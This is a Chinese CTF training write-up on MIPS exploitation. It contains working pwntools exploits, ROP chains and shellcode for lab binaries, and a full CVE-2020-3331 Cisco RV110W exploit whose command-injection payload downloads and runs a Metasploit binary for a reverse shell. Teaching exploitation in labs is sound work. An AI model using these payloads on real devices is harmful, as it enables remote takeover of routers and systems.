2022CTF培训(九)MIPS PWN环境搭建&MIPS PWN入门

这篇具有很好参考价值的文章主要介绍了2022CTF培训(九)MIPS PWN环境搭建&MIPS PWN入门。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

附件下载链接

环境搭建

在 ARM PWN 环境搭建 的基础上,首先安装具备MIPS交叉编译gcc与MIPS程序动态链接库:

sudo apt-get install gcc-mips-linux-gnu
sudo apt-get install gcc-mipsel-linux-gnu
sudo apt-get install gcc-mips64-linux-gnuabi64
sudo apt-get install gcc-mips64el-linux-gnuabi64

然后就可以正常运行
mips pwn,linux,系统安全
将 mipsel 添加到 qqemu-binfmt,这样 linux 可以根据文件头找相应的程序运行:

sudo ln -s /usr/mipsel-linux-gnu/ /etc/qemu-binfmt/mipsel

mips pwn,linux,系统安全

ret2win

栈溢出

int pwnme()
{
  char buf[32]; // [sp+18h] [+18h] BYREF

  memset(buf, 0, sizeof(buf));
  puts("For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!");
  puts("What could possibly go wrong?");
  puts("You there, may I have your input please? And don't worry about null bytes, we're using read()!\n");
  printf("> ");
  read(0, buf, 0x38u);                          // bof
  return puts("Thank you!");
}

分析汇编可知,返回值存储在 $sp + 0x3C 处,而 buf 起始位置在 $sp + 0x18 处,因此偏移为 0x24 。
mips pwn,linux,系统安全
因此不难写出 exp:

from pwn import *

context(arch='mips', os='linux')
context.log_level = 'debug'
# p = remote()
p = process(["qemu-mipsel", "./ret2win_mipsel"])
# p = process(["qemu-mipsel", "-g", "1234", "./ret2win_mipsel"])
elf = ELF("./ret2win_mipsel")

ret2win = 0x00400A00

if __name__ == '__main__':
    payload = "a" * 0x24 + p32(ret2win)
    p.sendafter(">", payload)
    p.interactive()

运行 exp,并用 gdb 附加调试,发现返回值被成功覆盖:
mips pwn,linux,系统安全
与 x86 和 arm 不同的是,mips 在函数返回时会先将之前保存到栈上的返回地址重新读取到 $ra 寄存器中,然后再通过 $jr ra 语句将返回值从 $ra 寄存器赋值到 $pc 寄存器中,因此跳转到 ret2win 后会出现 $pc 寄存器和 $ra 寄存器的值相等的情况,也就是会说之后重复执行 ret2win 函数。
mips pwn,linux,系统安全
继续运行,成功执行 ret2win 函数获得 flag 。
mips pwn,linux,系统安全

split

同样是栈溢出

int pwnme()
{
  char buffer[32]; // [sp+18h] [+18h] BYREF

  memset(buffer, 0, sizeof(buffer));
  puts("Contriving a reason to ask user for data...");
  printf("> ");
  read(0, buffer, 0x60u);                       // bof
  return puts("Thank you!");
}

存在可利用的字符串并且 system 函数在 plt 表里。

.data:00411010 usefulString:   .ascii "/bin/cat flag.txt"<0>

现在需要一个可以从栈中读取地址到 r0 的 gadget 。使用 ROPgadget 搜索可用的 gadget :

ROPgadget --binary "./split_mipsel" | grep -E ": lw .*a0, .*sp"

找到一个合适的 gadget :

0x00400a20 : lw $a0, 8($sp) ; lw $t9, 4($sp) ; jalr $t9 ; nop

最终 exp 如下:

from pwn import *

elf = ELF("./split_mipsel")
context(arch=elf.arch, os=elf.os)
context.log_level = 'debug'
# p = process(["qemu-mipsel", "./split_mipsel"])

p = process(["qemu-mipsel", "-g", "1234", "./split_mipsel"])
gdb.attach(target=('127.0.0.1', 1234), exe='./split_mipsel', gdbscript='b *0x400984\nc')

payload = 'a' * 36
payload += p32(elf.search(asm('lw $a0, 8($sp) ; lw $t9, 4($sp) ; jalr $t9 ; nop'), executable=True).next())
payload += 'bbbb'
payload += p32(elf.plt['system'])
payload += p32(elf.search('/bin/cat flag.txt').next())
p.sendafter(">", payload)
p.interactive()

callme

根据之前 ARM PWN 的分析,需要通过栈溢出构造 rop 分别调用 3 个 callme 函数完成对 flag 的打印和输出。

通过 ROPgadget 搜索到一个合适的 gedget 。

 ► 0x400bb0 <usefulGadgets>       lw     $a0, 0x10($sp)
   0x400bb4 <usefulGadgets+4>     lw     $a1, 0xc($sp)
   0x400bb8 <usefulGadgets+8>     lw     $a2, 8($sp)
   0x400bbc <usefulGadgets+12>    lw     $t9, 4($sp)
   0x400bc0 <usefulGadgets+16>    jalr   $t9
 
   0x400bc4 <usefulGadgets+20>    nop    
   0x400bc8 <usefulGadgets+24>    lw     $ra, 0x14($sp)
   0x400bcc <usefulGadgets+28>    jr     $ra                           <usefulGadgets>
 
   0x400bd0 <usefulGadgets+32>    addi   $sp, $sp, 0x18

这个 gadget 首先分别对 $a0$a1$a2 以及 $t9 寄存器赋值,然后调用 $t9 寄存器指向的函数,最后再修改 $ra 寄存器并跳转到 $ra 寄存器指向的地址并且将 $sp 增加 0x18。因此可以设置 $a0$a1$a2 为函数的三个参数,然后设置 $t9 寄存器为函数对应的 plt 表地址,最后设置 $ra 寄存器为 gadget 地址从而进行下一次函数调用。

exp 如下:文章来源地址https://www.toymoban.com/news/detail-680635.html

from pwn import *

context.log_level = 'debug'

elf = ELF("./callme_mipsel")
context(arch=elf.arch, os=elf.os)

p = process(["qemu-mipsel", "-g", "1234", "./callme_mipsel"])
gdb.attach(target=('127.0.0.1', 1234), exe='./callme_mipsel', gdbscript='b *0x400AD4\nc')


# p = process(["qemu-mipsel", "./callme_mipsel"])


def callme(addr, arg1, arg2, arg3):
    payload = ""
    payload += p32(0)
    payload += p32(addr)
    payload += p32(arg3)
    payload += p32(arg2)
    payload += p32(arg1)
    payload += p32(elf.search(asm('lw $a0, 0x10($sp); lw $a1, 0xc($sp); lw $a2, 8($sp); lw $t9, 4($sp); jalr $t9; nop;'), executable=True).next())
    return payload


payload = ""
payload += "a" * 36
payload += p32(elf.search(asm('lw $a0, 0x10($sp); lw $a1, 0xc($sp); lw $a2, 8($sp); lw $t9, 4($sp); jalr $t9; nop;'), executable=True).next())
payload += callme(elf.plt["callme_one"], 0xDEADBEEF, 0xCAFEBABE, 0xD00DF00D)
payload += callme(elf.plt["callme_two"], 0xDEADBEEF, 0xCAFEBABE, 0xD00DF00D)
payload += callme(elf.plt["callme_three"], 0xDEADBEEF, 0xCAFEBABE, 0xD00DF00D)
p.sendafter(b">", payload)
p.interactive()

跳转的 plt 表并返回这里可能会存在一些疑惑。按常理再说,plt 应该对调用者透明,也就是说调用 plt 表应该像直接调用函数一样,但是以 callme_one 函数为例,plt 表部分的汇编代码如下(这里 plt 的起始位置有点奇怪,这是因为 ida 是按照符号表指向的位置识别的):

.MIPS.stubs:00400D1C                 li      $t8, 0x19
.MIPS.stubs:00400D1C  # End of function _callme_three
.MIPS.stubs:00400D1C
.MIPS.stubs:00400D20
.MIPS.stubs:00400D20  # =============== S U B R O U T I N E =======================================
.MIPS.stubs:00400D20
.MIPS.stubs:00400D20
.MIPS.stubs:00400D20  # int callme_one()
.MIPS.stubs:00400D20 _callme_one:                             # DATA XREF: LOAD:0040056C↑o
.MIPS.stubs:00400D20                 lw      $t9, _GLOBAL_OFFSET_TABLE_
.MIPS.stubs:00400D24                 move    $t7, $ra
.MIPS.stubs:00400D28                 jalr    $t9

gadget 中跳转的方式是 jalr $t9 ,是一个正常的函数调用,返回值会保存到 $ra 中,进入到函数后如果函数还会调用其他函数首先要做的是将 $ra 寄存器保存到栈中。但是 callme_one 的 plt 表中没有将 $ra 寄存器保存到栈中,而是将 $ra 赋值给临时寄存器 $t7 并 jalr $t9 覆盖了 $ra 寄存器的值,那么调用完 callme_one 之后岂不是会返回到下一条指令然后沿着 plt 表继续往下执行?
实际上, 这里 plt 表中 _GLOBAL_OFFSET_TABLE_ 并不是 callme_one 的 got 地址,而是 got 表的起始地址。got 表的起始位置会存放一个函数的地址,如果要调用的函数在 got 表中没有修复地址,那么这个函数会修复该地址,最后会调用对应函数。在此期间会将 $ra 寄存器的值修改为调用 plt 表的下一条指令使得程序可以正常返回。

write4

根据之前 ARM PWN 的分析,需要通过写内存的 gadget 写入文件名然后调用 print_file 函数打印参数。

写内存可以用 0x00400930 处的 gadget 。

0x00400930 : lw $t9, 0xc($sp) ; lw $t0, 8($sp) ; lw $t1, 4($sp) ; sw $t1, ($t0) ; jalr $t9 ;

调用 print_file 函数可以用 0x00400948 处的gadget 。

0x00400948 : lw $a0, 8($sp) ; lw $t9, 4($sp) ; jalr $t9 ; nop

最终 exp 如下:

from pwn import *

elf = ELF("./write4_mipsel")
context(arch=elf.arch, os=elf.os)
context.log_level = 'debug'

p = process(["qemu-mipsel", "-g", "1234", "./write4_mipsel"])
# p = process(["qemu-mipsel", "./write4_mipsel"])

gdb.attach(target=('127.0.0.1', 1234), exe='./write4_mipsel', gdbscript='b *0x3ffb0994\nc')

file_name_addr = 0x411000 + 0x200


def write4(addr, data):
    payload = ""
    payload += p32(elf.search(asm('lw $t9, 0xc($sp); lw $t0, 8($sp); lw $t1, 4($sp); sw $t1, ($t0); jalr $t9; addi $sp, $sp, 0x10;'), executable=True).next())
    payload += "aaaa"
    payload += data[:4].ljust(4, '\x00')  # $t1
    payload += p32(addr)  # t0
    return payload


payload = 'a' * 0x24
payload += write4(file_name_addr, "flag")
payload += write4(file_name_addr + 4, ".txt")
payload += write4(file_name_addr + 8, '\x00')
payload += p32(elf.search(asm('lw $a0, 8($sp); lw $t9, 4($sp); jalr $t9; nop;'), executable=True).next())
payload += 'aaaa'
payload += p32(elf.plt['print_file'])
payload += p32(file_name_addr)
p.sendafter(">", payload)
p.interactive()

CVE-2020-3331

环境搭建

github的 IoT-vulhub 项目提供了这个漏洞的环境。虽然项目有详细的 README 可供参考,但是还是有一些细节没有提及,并且还会出现一些玄学问题。因此如果环境没有搭好,要认真阅读报错信息寻找出错的地方,实在分析不出问题就恢复快照重新搭一遍

构建所需镜像

漏洞环境的搭建需要依赖一些镜像,其中有些 README 默认使用者已经构建好了,因此没有说明,建议以以下的描述为准。由于镜像之间有依赖关系,因此最好按照按照顺序构建。

  • ubuntu16.04
    整个项目都要依赖的镜像
    # 构建 ubuntu1604 基础镜像
    $ cd baseImage/ubuntu1604 && docker build -t firmianay/ubuntu1604 .
    
  • binwalk
    作为解压固件的工具包
    # 构建 binwalk 容器,方便使用
    $ cd baseImage/binwalk && docker build -t firmianay/binwalk .
    
  • qemu-system
    调试漏洞所需的镜像,因为固件是 mipsel 架构的,因此选择 mipsel 。注意要要先运行下载脚本下载内核镜像之类的文件。
    $ cd baseImage/qemu-system/mipsel/images
    $ ./download.sh
    $ cd baseImage/qemu-system/mipsel/
    $ docker build -t firmianay/qemu-system:mipsel .
    

解压固件

在 CVE-2020-3331 目录下运行如下命令:

$ docker run --rm -v $PWD/firmware/:/root/firmware firmianay/binwalk -Mer "/root/firmware/RV110W_FW_1.2.2.5.bin"

如果是使用本机的 binwalk 需要安装 sasquatch

git clone https://github.com/devttys0/sasquatch.git
cd sasquatch
wget https://github.com/devttys0/sasquatch/pull/47.patch
patch -p1 < 47.patch
sudo ./build.sh

另外新版的 binwalk 为了安全会将符号链接到具体设备的链接修改为链接到 /dev/null ,因此需要添加 --preserve-symlinks 参数。

正常情况下解压出的 squashfs-root 下是有文件的。mips pwn,linux,系统安全
如果没有文件就重新构建 binwalk 镜像然后重新解压,重新构建前要把之前的镜像删除。

构建并启动漏洞分析镜像

依次运行如下 3 条命令:

# 初始化环境
$ ./init_env.sh mipsel
# 构建镜像
$ docker-compose -f docker-compose-system.yml build
# 启动容器
$ docker-compose -f docker-compose-system.yml up

如果正常的话最后是这样的:
mips pwn,linux,系统安全

首次攻击尝试

进入到构建好的镜像中运行 exp 脚本,可以成功获取 shell 。
mips pwn,linux,系统安全

调试

由于镜像的中的 python 版本有问题导致 gef 插件跑不起来,因此这里采用本机调试。

在构建并启动漏洞分析镜像后,进入镜像的 shell 然后关闭并手动重启固件主机,从而进入固件主机的 shell

$ docker exec -it cisco-system /bin/bash

root@7463bb44fe27:$ cd images
root@7463bb44fe27:$ ps -ef | grep qemu-system  | awk '{print $2}' | xargs kill -9
root@7463bb44fe27:$ qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -append "root=/dev/sda1 console=tty0" -net nic -net tap,ifname=tap0,script=no,downscript=no -nographic

进入固件主机后运行 run_httpd.sh 启动脚本然后运行 gdbserver 附加到固件对应进程并监听 6666 端口。

root@debian-mipsel:$ cd squashfs-root/
root@debian-mipsel:$ ./tools/run_httpd.sh
root@debian-mipsel:$ ps -ef | grep httpd | grep -v 'grep' | awk '{print $2}' | xargs ./tools/gdbserver :6666 --attach
Attached; pid = 2328
Listening on port 6666

再开一个控制台窗口进入 docker 镜像然后开启固件主机 6666 端口到docker进行 6666 端口的端口转发。

$ docker exec -it cisco-system /bin/bash
$ ssh root@127.0.0.1 -f -N -g -R 0.0.0.0:6666:192.168.2.2:6666

由于 docker-compose 配置了本机 6666 端口到镜像 6666 端口的端口映射,因此可以用 gdb 连本地的 6666 端口调试固件主机中的固件。

ports:
    - "8888:80"
    - "6666:6666"

注意,开启端口转发时中间有个询问是否继续连接的步骤,这里回车默认不是 yes,一定要手动把 yes 输进去。否则会有个报错然后就被网上的关于这个报错解决方法带偏了
mips pwn,linux,系统安全
之后 gdb attach 上本地的 6666 端口就可以进行调试了,这里 gdb 插件不建议用 pwndbg(pwndbg 比较卡,另外如果使用 pwndbg 需要设置 set follow-fork-mode parent 防止跟踪到子进程)。
mips pwn,linux,系统安全
在关键位置下好断点,然后再开一个窗口进入 docker 的 shell 运行 exp,成功在关键位置断下来:
mips pwn,linux,系统安全

不依赖 docker 的调试方法

上面的方法本质是在 docker 中运行与调试 qemu 的中的固件,这种方法非常不方便,这里参考之前在 docker 中调试程序的方法实现在 qemu 中自动化调试分析固件。

由于 qemu 不像 docker 这样有专门的执行命令的接口,因此这里利用 pwntools 实现相关功能。

我们事先做一些初始化操作,比如拷贝文件系统和相关工具到 qemu 虚拟机中,并在主机创建虚拟网卡方便与 qemu 进行通信。这里对磁盘镜像的修改会被保存,因此下一次启动 qemu 虚拟机时就不必再次传送文件。

if ! ip link show tap0 &>/dev/null; then
    tunctl -t tap0 -u $(whoami)
fi
ifconfig tap0 192.168.2.1/24

sshpass -p root scp ./squashfs-root.tar.gz root@192.168.2.2:~

tar zxf squashfs-root.tar.gz && rm squashfs-root.tar.gz # 注意这条命令是在 qemu 虚拟机中执行的

sshpass -p root scp -r ./tools root@192.168.2.2:~/squashfs-root/tools
#!/usr/bin/python2
# coding=utf-8

from pwn import *

context.log_level = 'debug'

qemu = process(['qemu-system-mipsel',
                '-M', 'malta',  # 主板,看内核镜像后缀。
                '-kernel', 'vmlinux-3.2.0-4-4kc-malta', # 内核镜像
                '-hda', 'debian_wheezy_mipsel_standard.qcow2', # 虚拟硬盘镜像
                '-append', 'root=/dev/sda1 console=tty0', # 内核启动参数
                '-net', 'nic', # 添加一个网络接口卡(NIC)到模拟器中,以实现网络功能。
                '-net', 'tap,ifname=tap0,script=no,downscript=no', # 添加一个 TAP 设备,并将其与模拟器中的网络接口卡关联起来,用于与主机的网络进行通信。
                '-nographic' # 禁用图形界面输出,只使用命令行界面进行连接和操作。
                ])

# 登录
qemu.sendlineafter("debian-mipsel login:", "root")
qemu.sendlineafter("Password:", "root")

# 设置 ip
qemu.sendlineafter("root@debian-mipsel:~# ", "ifconfig eth0 192.168.2.2/24")

# 关闭 ASLR
qemu.sendlineafter("root@debian-mipsel:~# ", "echo 0 > /proc/sys/kernel/randomize_va_space")

# 挂载设备
qemu.sendlineafter("# ", "mount -o bind /dev ./squashfs-root/dev && mount -t proc /proc ./squashfs-root/proc")

# 设置根目录
qemu.sendlineafter("# ", "chroot squashfs-root/ sh")

# nvram 配置文件
qemu.sendlineafter("# ", "cp ./tools/nvram.ini ./")

# 启动 httpd
qemu.sendlineafter("# ", "LD_PRELOAD='./tools/libnvram-faker.so' /usr/sbin/httpd")

# 阻塞等待 http 请求
pause()

# gdbserver 附加程序
qemu.sendlineafter("#", "ps | grep httpd | grep -v 'grep' | awk '{print $1}' | xargs ./tools/gdbserver :9999 --attach")

qemu.interactive()

这样我们在 exp 脚本中就可以通过下面这种方式来远程调试。

gdb.attach(target=('192.168.2.2', 9999), exe=elf.path, gdbscript='set follow-fork-mode parent\nb *0x0431B60\nc')
pause()

漏洞分析

漏洞位于 guest_logout_cgi 函数。sscanf 可以造成栈溢出。
mips pwn,linux,系统安全
guest_logout_cgi 函数与漏洞触发有关的关键代码如下:

int __fastcall guest_logout_cgi(int a1)
{
	...
	v5 = (const char *)get_cgi((int)"cmac");
	...
	v10 = (const char *)get_cgi((int)"cip");
	v11 = (const char *)get_cgi((int)"submit_button");
	if ( !v11 )
	  v11 = "";
	if ( v5 && v10 )
	{
		...
		if ( VERIFY_MAC_17(v5) && VERIFY_IPv4(v10) ) // cmac 字段必须是合法的 MAC 地址,并且 cip 字段必须是合法的 IP 地址。
		{
			v17 = strstr(v11, "status_guestnet.asp");
			if ( !v17 )	// submit_button 字段必须包含 "status_guestnet.asp"
				goto LABEL_31;
			sscanf(v11, "%[^;];%*[^=]=%[^\n]", v36, v35); // v36 溢出
			...
			v24 = (const char *)nvram_get("session_key", v21, v22); // 没有 session_key 字段会进入下面的判断中。
			if ( !v24 || (v25 = 1, strcmp(v24, v35)) )
			{
LABEL_31:
				v26 = (const char *)nvram_get("http_client_mac", v18, v19); // 没有 http_client_mac 和 http_client_ip 字段,不会进入下面的判断中。
				if ( v26 && strcmp(v26, v5) || (v31 = (const char *)nvram_get("http_client_ip", v27, v28)) != 0 && strcmp(v31, v10) )
				{
					...
					goto LABEL_35;
				}
				...
			}
			...
LABEL_35:
			if ( strcmp(v11, "login_guest.asp") ) // v11 与 login_guest.asp 不相同,因此会退出,由于此时返回值被覆盖成 system 函数地址且 $a0 为 v11 即 submit_button 字段从第一个 status_guestnet.asp 开始的字符串,因此会执行 submit_button 中包含的命令。
				return 0;
		}
		...
	}
	return 0;
}

sscanf 中的格式化字符串为 %[^;];%*[^=]=%[^\n] ,其中 %[^;] 含义为匹配不包含 ; 的字符串,%*[^=] 表示匹配不带 = 且匹配到的只出场不传给参数,%[^\n] 表示匹配不带 \n 的字符串。最终匹配到的字符串按顺序传给给定的参数。因此只需要构造一个以 status_guestnet.asp 开头,后面包含没有 ; 的要执行的命令以及填充字节最后加一个 system 函数地址就可以执行命令了。
通过 IDA 分析汇编可知溢出长度为 0x68
mips pwn,linux,系统安全
至于执行的命令,可以是从 wget 获取本地的 msf 工具然后运行改工具反弹 shell 。
完整 exp 如下:

#!/usr/bin/python3

from pwn import *
import requests
from threading import Thread

context(arch='mips', endian='little', os='linux')

system = 0x0047A610

cmd  = '\n'
cmd += 'wget http://192.168.2.1:8000/tools/msf -O /msf\n'
cmd += 'chmod 777 /msf\n'
cmd += '/msf\n'

assert(len(cmd) < 0x55)

payload = b"status_guestnet.asp" + cmd.ljust(0x55,'a').encode() + p32(system) 
data = {"cmac":"12:af:aa:bb:cc:dd", "submit_button":payload, "cip":"192.168.100.1"}

def attack():
    try:
        requests.post("http://192.168.2.2/guest_logout.cgi", data=data, timeout=1)
    except Exception as e:
        print(e)

thread = Thread(target=attack)
thread.start()

io = listen(31337)
io.wait_for_connection()
log.success("getshell")
io.interactive()

thread.join()

运行 exp,可以看到函数返回地址被覆盖了 system 函数地址
mips pwn,linux,系统安全
继续运行到函数返回,此时 $a0 寄存器指向 v11 字符串,可以执行其中的命令。
mips pwn,linux,系统安全

DVRF stack_bof_02

题目源码如下:

#include <string.h>
#include <stdio.h>
#include <stdlib.h>

//Simple BoF by b1ack0wl for E1550
//Shellcode is Required


int main(int argc, char **argv[]){
char buf[500] ="\0";

if (argc < 2){
printf("Usage: stack_bof_01 <argument>\r\n-By b1ack0wl\r\n");
exit(1);
} 


printf("Welcome to the Second BoF exercise! You'll need Shellcode for this! ;)\r\n\r\n"); 
strcpy(buf, argv[1]);

printf("You entered %s \r\n", buf);
printf("Try Again\r\n");

return 0;
}

// mipsel-linux-gnu-gcc -fno-stack-protector stack_bof_02.c -o stack_bof_02

显然 main 函数中 strcpy 存在栈溢出。由于没有后门函数并且没有开 NX 保护,因此可以考虑 ret2shellcode 的做法。
这里要注意由于 mips 是流水指令集,存在 cache incoherency 的特性,需要在跳转到 shellcode 前调用 sleep 或者其他函数将数据区刷新到当前指令区中去,才能正常执行 shellcode 。

在查找 gadget 的时候发现,stack_bof_02 文件可用的 gadget 很少,由于 qemu 中每次运行 libc 加载的基址相同,因此可以考虑使用 libc 中的 gadget 。在我的环境中需要分析的是 libc-2.30.so

$ ls -al /usr/mipsel-linux-gnu/lib | grep "libc.so"
-rw-r--r-- 1 root root     301 924  2019 libc.so
lrwxrwxrwx 1 root root      12 924  2019 libc.so.6 -> libc-2.30.so

libc 基址可以通过 got 表中的函数地址与该函数在 libc 中的偏移算出来。
mips pwn,linux,系统安全

又因为 ROPgadget 找不到合适的 gadget ,因此这里使用 IDA 插件 MIPS ROP Finder 搜索 gadget 。
插件在附件中提供。我使用的 IDA 版本是 7.7 ,安装方式是将压缩包解压,然后将里面的文件放到 plugins 文件夹下,注意我放的是解压出的 shimsmipsrop.py 这两个项。之后重启 IDA 然后点击 Search -> mips rop gadgets 等待插件初始化完成就可以正常使用了。
由于要调用 sleep 函数,因此首先要设置参数寄存器 $a0 的值:

Python>mipsrop.find("li $a0, 1")
----------------------------------------------------------------------------------------------------------------
|  Address     |  Action                                              |  Control Jump                          |
----------------------------------------------------------------------------------------------------------------
|  0x000B9350  |  li $a0,1                                            |  jalr  $s2                             |
|  0x000E2660  |  li $a0,1                                            |  jalr  $s2                             |
|  0x00109918  |  li $a0,1                                            |  jalr  $s1                             |
|  0x0010E604  |  li $a0,1                                            |  jalr  $s2                             |
|  0x0012D650  |  li $a0,1                                            |  jalr  $s0                             |
|  0x0012D658  |  li $a0,1                                            |  jalr  $s2                             |
|  0x00034C5C  |  li $a0,1                                            |  jr    0x18+var_s4($sp)                |
|  0x00080100  |  li $a0,1                                            |  jr    0x18+var_s4($sp)                |
|  0x00088E80  |  li $a0,1                                            |  jr    0x1C+var_s0($sp)                |
|  0x00091134  |  li $a0,1                                            |  jr    0x70+var_s24($sp)               |
|  0x00091BB0  |  li $a0,1                                            |  jr    0x70+var_s24($sp)               |
|  0x000D5460  |  li $a0,1                                            |  jr    0x1C+var_s10($sp)               |
|  0x000F2A80  |  li $a0,1                                            |  jr    0x1C+var_s0($sp)                |
|  0x001251C0  |  li $a0,1                                            |  jr    0x18+var_s14($sp)               |
----------------------------------------------------------------------------------------------------------------
Found 14 matching gadgets

这里选择 0x000E2660 地址处的 gadget :

.text:000E2660 25 C8 40 02                   move    $t9, $s2
.text:000E2664 09 F8 20 03                   jalr    $t9 ; sigprocmask
.text:000E2668 01 00 04 24                   li      $a0, 1

由于这个 gadget 的跳转需要 $s2 控制,因此需要一个设置 $s2 的 gadget ,这里找的是 0x00E2660 处的 gadget 。这条 gadget 不可可以控制 $s2 的值,还能控制其他的 $s 寄存器的值,也就是说后面的 gadget 的 $s 寄存器的值都可以控制。

.text:000B2EE8 34 00 BF 8F                   lw      $ra, 0x34($sp)
.text:000B2EE8
.text:000B2EEC
.text:000B2EEC                               loc_B2EEC:                               # CODE XREF: readdir64+194↓j
.text:000B2EEC 25 10 00 02                   move    $v0, $s0
.text:000B2EF0 30 00 B6 8F                   lw      $s6, 0x18+var_s18($sp)
.text:000B2EF4 2C 00 B5 8F                   lw      $s5, 0x18+var_s14($sp)
.text:000B2EF8 28 00 B4 8F                   lw      $s4, 0x18+var_s10($sp)
.text:000B2EFC 24 00 B3 8F                   lw      $s3, 0x18+var_sC($sp)
.text:000B2F00 20 00 B2 8F                   lw      $s2, 0x18+var_s8($sp)
.text:000B2F04 1C 00 B1 8F                   lw      $s1, 0x18+var_s4($sp)
.text:000B2F08 18 00 B0 8F                   lw      $s0, 0x18+var_s0($sp)
.text:000B2F0C 08 00 E0 03                   jr      $ra
.text:000B2F10 38 00 BD 27                   addiu   $sp, 0x38

因为如果在执行完 0x000E2660 处的 gadget 后直接跳转到 sleep 函数那么会返回到这个 gadget 跳转地址后的指令继续执行这样就无法控制之后的程序执行流程。为了防止这种情况发生,我们需要在这条 gadget 和 sleep 函数之间加一条 jlar $ra 之后还能控制跳转的指令。考虑到前面已经把 $s 寄存器控制了,因此可以查找 mov $t9, $s3 指令。这里选择 0x000949EC 地址处的gadget 。

.text:000949EC 25 C8 60 02                   move    $t9, $s3
.text:000949F0 09 F8 20 03                   jalr    $t9 ; uselocale
.text:000949F4 25 80 40 00                   move    $s0, $v0
.text:000949F4
.text:000949F8
.text:000949F8                               loc_949F8:                               # CODE XREF: strerror_l+15C↓j
.text:000949F8 34 00 BF 8F                   lw      $ra, 0x24+var_s10($sp)
.text:000949FC 25 10 00 02                   move    $v0, $s0
.text:00094A00 30 00 B3 8F                   lw      $s3, 0x24+var_sC($sp)
.text:00094A04 2C 00 B2 8F                   lw      $s2, 0x24+var_s8($sp)
.text:00094A08 28 00 B1 8F                   lw      $s1, 0x24+var_s4($sp)
.text:00094A0C 24 00 B0 8F                   lw      $s0, 0x24+var_s0($sp)
.text:00094A10 08 00 E0 03                   jr      $ra
.text:00094A14 38 00 BD 27                   addiu   $sp, 0x38

之后的操作就是如何跳转到 shellcode上执行。虽然在 qemu 中栈地址不变,但这里提供一个泄露栈地址的方法。
mipsrop.stackfinder() 可以搜索到泄露栈地址的 gadget,这里选择 0x00095B74 地址处的 gadget :

.text:00095B74 34 00 A5 27                   addiu   $a1, $sp, 0x34  # '4'
.text:00095B78 18 00 A0 AF                   sw      $zero, 0x5C+var_44($sp)
.text:00095B7C 14 00 A2 AF                   sw      $v0, 0x5C+var_48($sp)
.text:00095B80 25 38 40 02                   move    $a3, $s2
.text:00095B84 25 C8 A0 02                   move    $t9, $s5
.text:00095B88 09 F8 20 03                   jalr    $t9

由于栈地址已经泄露到 $a1 寄存器中,因此可以搜索 mov $t9, $a1 查找可以用 $a1 寄存器控制跳转地址的 gadget ,这里选择的是 0x0012568C 处的地址。

.text:0012568C 25 C8 A0 00                   move    $t9, $a1
.text:00125690 25 38 40 00                   move    $a3, $v0
.text:00125694 25 28 80 00                   move    $a1, $a0
.text:00125698 09 F8 20 03                   jalr    $t9

最终可构造出的 rop 如下:
mips pwn,linux,系统安全
事实上 MIPS 的 ROP 的构造比 x86 要简单,因为对应 call 指令的 jalr 指令不会改变栈且可以根据寄存器的值进行跳转。但这也意味着 ROP 的构造更加灵活。

exp 如下:

from pwn import *

context(arch='mips', os='linux')
# context.log_level = 'debug'
libc_base = 0x7F619000

if __name__ == '__main__':
    payload = "a" * 508
    payload += p32(libc_base + 0x000B2EE8)
    payload += "a" * 0x20
    payload += p32(libc_base + 0x000949EC)
    payload += p32(libc_base + 0x000B8FC0)
    payload += "aaaa"
    payload += p32(libc_base + 0x0012568C)
    payload += "aaaa"
    payload += p32(libc_base + 0x000E2660)
    payload += "a" * 0x34
    payload += p32(libc_base + 0x00095B74)
    payload += "a" * 0x34
    payload += asm(shellcraft.sh())
    # p = process(['qemu-mipsel-static',  '-g', '1234','./stack_bof_02', payload])
    p = process(['qemu-mipsel-static', './stack_bof_02', payload])
    p.interactive()

到了这里,关于2022CTF培训(九)MIPS PWN环境搭建&MIPS PWN入门的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • CTF-PWN学习-为缺少指导的同学而生

      更新公告:         2023-7-5晚上21:12 已更新,对内容做了些调整。 调整如下:         添加 解题步骤描述          添加 专业名词描述         博主也是个PWN的入门者。PWN的入门不可能是无痛的。能做到的只是减少一点初学者的痛苦。这篇博客会长期维护,也会

    2024年02月07日
    浏览(44)
  • GDOU-CTF-2023新生赛Pwn题解与反思

    因为昨天学校那边要进行天梯模拟赛,所以被拉过去了。 16点30分结束,就跑回来宿舍开始写。 第一题和第二题一下子getshell,不用30分钟,可能我没想那么多,对比网上的WP,自己和他们有点不太一样,比较暴力。 大概17点10的时候,写第三题,可能自己第一次遇到随机数问

    2023年04月17日
    浏览(59)
  • PWN学习之格式化字符串及CTF常见利用手法

    格式化字符串漏洞是一种常见的安全漏洞类型。它利用了程序中对格式化字符串的处理不当,导致可以读取和修改内存中的任意数据。 格式化字符串漏洞通常发生在使用 C 或类似语言编写的程序中,其中  printf 、 sprintf 、 fprintf  等函数用于将数据格式化为字符串并进行输出

    2024年02月19日
    浏览(41)
  • ciscn2022-线上-半决-pwn

    一个简单的可见字符shellcode 用杭电师傅的工具直接出shellcode,直接写进出就可以拿到shell。 epx: number是4个字节,后面malloc的参数也是4个字节,可以利用溢出使number很大,然后malloc申请的大小也在一个合理的范围之内。 malloc函数的实现会根据分配内存的size来决定使用哪个分配

    2024年02月06日
    浏览(36)
  • 2022级云曦实验室考试(一)pwn

    讲真,俺都不知道pwn是啥,等俺搜搜! CTF中的pwn指的是通过通过程序本身的漏洞,编写利用脚本破解程序拿到主机的权限,这就需要对程序进行分析,了解操作系统的特性和相关漏洞,是是一个难度比较大的分支。 一.NC NC:的使用 nc的全名是netcat,其主要用途是建立和监听任

    2024年02月06日
    浏览(42)
  • CTFshow-pwn入门-前置基础pwn32-pwn34

    FORTIFY_SOURCE(源码增强),这个其实有点类似与Windows中用新版Visual Studio进行开发的时候,当你用一些危险函数比如strcpy、sprintf、strcat,编译器会提示你用xx_s加强版函数。 FORTIFY_SOURCE本质上一种检查和替换机制,对GCC和glibc的一个安全补丁。 目前支持memcpy, memmove, memset, strcpy, s

    2024年02月09日
